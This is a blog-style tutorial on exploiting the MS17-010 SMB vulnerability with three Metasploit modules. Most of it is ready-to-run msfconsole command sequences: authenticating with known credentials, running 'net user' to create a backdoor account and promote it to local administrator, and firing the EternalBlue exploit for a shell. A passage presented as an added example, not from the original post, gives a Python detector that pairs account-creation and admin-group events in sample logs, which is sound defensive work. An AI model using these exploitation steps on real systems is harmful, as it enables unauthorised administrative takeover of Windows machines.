A Guide to Exploiting MS17-010 With Metasploit - 2020 Edition
One of the articles I have written that got the most traction was the one on exploiting MS17-010 with Metasploit back in 2017. Well, things have changed: tools have changed, and methods have changed. Because of that, consider this the 2020 edition of that post.
Metasploit has three (3) modules that can exploit this vulnerability and are commonly used. I have listed them in order of most reliable to least reliable.
use exploit/windows/smb/ms17_010_psexec (with credentials)
use auxiliary/admin/smb/ms17_010_command
use exploit/windows/smb/ms17_010_eternalblue
I’ll go into detail using each of the above as examples.
ms17_010_psexec with credentials
This module is by far the most reliable; however, you do need credentials for the machine. Some use cases for it are the following:
You have regular domain user credentials on the network and want to get admin on a machine.
You have local user credentials for the machine and want to get admin.
You want to validate that the vulnerability exists using a stable exploit.
Steps for using this exploit:
msfconsole // fires up metasploit
use exploit/windows/smb/ms17_010_psexec // loads the metasploit module
set smbuser jsmith // sets the username when authenticating to the machine
set smbpass Password1 // sets the password for the user
set smbdomain CORP // sets the domain to use. If this is a local account, use WORKGROUP or WORKSTATION as this value.
set RHOST <IP ADDRESS> // this sets the IP address of the target machine. Replace <IP ADDRESS> with the IP address of the target system
run // this executes the command
The above exploit will work in almost all scenarios where the machine is vulnerable. This is the most reliable way to exploit MS17-010 on a machine.
ms17_010_command
This is the module I use in most cases, as I don’t have any credentials and need to exploit a machine that I have found to be vulnerable. The commands to get this to work are the following.
use auxiliary/admin/smb/ms17_010_command // loads the metasploit module
set CMD net user james Password1 /add // adds the local user of “james” to the machine
set RHOST <IP ADDRESS> // this sets the IP address of the target machine. Replace <IP ADDRESS> with the IP address of the target system
run // this executes the command
Once this has run successfully, we need to run the module again with a new CMD to make the local user we just created (james) a local administrator. This can be done with the following command:
set CMD net localgroup administrators james /add
Once this is done, we can use psexec, crackmapexec, RDP, etc. to gain access to the machine!
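From the defender's side, the ms17_010_command sequence above leaves a distinctive footprint in the Windows Security log: an account-creation event (4720) followed seconds later by an addition to the built-in local Administrators group (4732). The following is an added example, not from the original post or from Metasploit, that correlates those two events over constructed sample data; the field names follow a hypothetical log-collector normalisation rather than the raw event XML.

```python
from datetime import datetime

# Well-known SID of the built-in local Administrators group (fixed on every Windows host).
ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample Security-log events (not real data), as a hypothetical log
# collector might normalise them. Event 4720 = "A user account was created",
# 4732 = "A member was added to a security-enabled local group". "account" is
# the created account (4720) or the added member (4732); "subject" is who did it.
SAMPLE_EVENTS = [
    {"time": "2020-05-01T10:00:01", "id": 4720, "account": "james",
     "subject": "WIN-TARGET$", "group_sid": None},
    {"time": "2020-05-01T10:00:07", "id": 4732, "account": "james",
     "subject": "WIN-TARGET$", "group_sid": ADMINISTRATORS_SID},
    {"time": "2020-05-01T11:30:00", "id": 4720, "account": "svc_backup",
     "subject": "helpdesk", "group_sid": None},
    {"time": "2020-05-01T11:31:00", "id": 4732, "account": "svc_backup",
     "subject": "helpdesk", "group_sid": "S-1-5-32-545"},   # Users group, not Administrators
    {"time": "2020-05-02T09:00:00", "id": 4732, "account": "bob",
     "subject": "helpdesk", "group_sid": ADMINISTRATORS_SID},  # no matching creation event
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_new_local_admins(events, window_seconds=600):
    """Return accounts that were created (4720) and then added to the local
    Administrators group (4732) within window_seconds. That pairing is the
    footprint of 'net user ... /add' followed by 'net localgroup administrators ... /add'."""
    created = {}  # lower-cased account name -> creation time
    hits = []
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        name = ev["account"].lower()
        if ev["id"] == 4720:
            created[name] = _ts(ev["time"])
        elif ev["id"] == 4732 and ev["group_sid"] == ADMINISTRATORS_SID:
            made = created.get(name)
            if made is not None:
                delta = int((_ts(ev["time"]) - made).total_seconds())
                if delta <= window_seconds:
                    hits.append({"account": name, "subject": ev["subject"], "seconds": delta})
    return hits


if __name__ == "__main__":
    for hit in find_new_local_admins(SAMPLE_EVENTS):
        print(f"ALERT: {hit['account']} made local admin {hit['seconds']}s "
              f"after creation by {hit['subject']}")
```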
ms17_010_eternalblue
This is the ugly stepchild of the MS17-010 exploits. It is very flaky, with a high risk of crashing the SMB service on the machine. Alas, if you’re feeling lucky, this is what you need to do.
use exploit/windows/smb/ms17_010_eternalblue // loads the Metasploit module
set RHOST <IP ADDRESS> // this sets the IP address of the target machine. Replace <IP ADDRESS> with the IP address of the target system
run // this executes the command
Chances are if you did not get a shell, you crashed the machine.